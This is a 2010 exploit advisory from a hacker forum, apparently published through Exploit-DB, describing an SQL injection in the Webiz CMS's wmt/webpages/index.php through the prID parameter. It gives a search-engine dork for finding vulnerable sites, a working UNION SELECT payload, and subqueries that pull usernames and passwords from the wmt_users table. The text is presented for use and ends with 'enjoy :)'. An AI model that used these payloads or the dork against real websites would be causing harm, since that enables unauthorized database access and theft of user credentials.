@@@@@@ @@ @@ @@@@@ @@@@@ @@ @@@@ @@ @@@@@@ @@@ @@@@
@@ @@ @@ @@ @@ @@ @@ @@ @ @@ @@ @@ @ @ @@ @
@@ @@@@@ @@ @@ @@@@@ @@ @@ @@ @@@@@ @@ @ @ @@ @@
@@ @@ @@ @@ @@ '' @@ @ @@ @@ @@ @ @ @@ @
@@ @@ @@ @@@@@ @@ @@ @@ @ @@ @@ @@ @@@ @@ @
VXA@HOTMAIL.FR
zn@live.de
VBHACKER.NET
===========================================================================
WEBIZ SQL INJECTION VULNERABILITY
===========================================================================
============================================================================
ABOUT ME
============================================================================
== Found By : THE PIRATOR ---> AYMEN AHMADI
== : kannibal615 ---> WALID TGS
== website : www.vbhacker.net/vb
==
== email : vxa [at] hotmail [dot] fr
== : zn [at] live [dot] de
==
==
== Thanks to : Pc-InSeCt / emptyzero
== : DAK / l3G3NDS / m0j4h3d
== : V!Ru$_T4ckJ3n / __MiM0__
== : / PrideArabs / DIESEL
== : ALL VBHACKER MEMBERS
==
============================================================================
INFORMATIONS
============================================================================
== Developers : www.webiz.gr
== vulner : SQL INJECTION
== Bug : ../wmt/webpages/index.php
== Variable1 : &prID=
== Variable2 : &apprec=
==
== dork : Powered by Webiz inurl:'wmt/webpages'
==
============================================================================
============================================================================
EXPLOIT
============================================================================
==
== Dork : Powered by Webiz inurl:'wmt/webpages'
==
== URL : ../wmt/webpages/index.php?lid=&pid=&prID=[Injection Here]
==
== Demo : http://localhost/wmt/webpages/index.php?lid=&pid=&prID=999.9'
==
== exploit : index.php?lid=&pid=&prID=-999.9/**/UNION/**/ALL/**/SELECT/**/1,2,3...,20--
==
== database : MySQL 5
==
++
==
== *** Insert This Code in THE VALID COLUMN ***
++ +
== *** CHANGE [DATABASE_NAME] ***
==
==
==
==
== USERNAME
==
== (SELECT/**/concat(cast(wmt_users.Username/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1)
==
==
==
== USER PASSWORD
==
== (SELECT/**/concat(cast(wmt_users.UserPassword/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1)
==
=============================================================================
enjoy :)
== Exploit-db.com
== VBHACKER.NET/VB
== kannibal615 Copyright (c) 2010